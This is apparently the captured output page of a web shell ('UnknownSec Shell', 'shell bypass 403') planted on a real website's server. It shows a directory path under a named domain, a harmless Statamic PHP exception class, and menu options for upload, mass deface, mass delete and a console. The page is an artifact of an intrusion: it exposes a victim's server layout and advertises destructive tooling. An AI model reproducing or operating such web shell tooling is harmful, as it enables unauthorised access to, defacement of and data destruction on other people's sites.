shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Exceptions
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
TermNotFoundException.php
<?php namespace Statamic\Exceptions; use Exception; class TermNotFoundException extends Exception { protected $term; public function __construct($term) { parent::__construct("Term [{$term}] not found"); $this->term = $term; } }
© 2026 UnknownSec